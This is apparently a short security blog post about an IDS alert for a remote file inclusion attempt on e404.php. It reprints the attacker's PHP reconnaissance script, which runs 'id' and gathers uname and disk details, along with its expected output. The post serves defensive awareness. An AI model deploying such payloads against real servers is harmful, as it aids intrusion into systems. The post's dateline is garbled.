MrNeti Tries to Enter the House

30 November -0001

This was an interesting one: I just ran across this alert from my IDS: - - [30/Jul/2008:04:32:54 -0400] 
"GET /node//e404.php?DOCUMENT_ROOT= HTTP/1.1" 404 4252

It seems someone is trying to read in an arbitrary file as part of a script execution. Tracking down the file I found it contained the following code:

function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }                          

echo "MrNETi<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "MrNETi<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";

Now, it this code were to execute (on my Linux VMware image) it would produce the following output:

uid=74(apache) gid=74(apache) groups=74(apache) MrNETi
uname -a: Linux localhost #1 SMP Tue Nov 20 08:09:17 EST 2007 i686
os: Linux
id: uid=74(apache) gid=74(apache) groups=74(apache)
free: 3.46 Gb
used: 4.22 Gb
total: 7.68 Gb

This looks like a pretty basic reconnaissance script. Keep an eye out for it though, it's presence may lead to more nasty attacks. At the very least, if you see this content going over your wire you know a remote file include vulnerability exists and has been exploited.

I did a little checking and couldn't find any known systems that utilize e404.php that could be vulnerable to a file include attack, but I'm sure one is out there if folks are searching for it.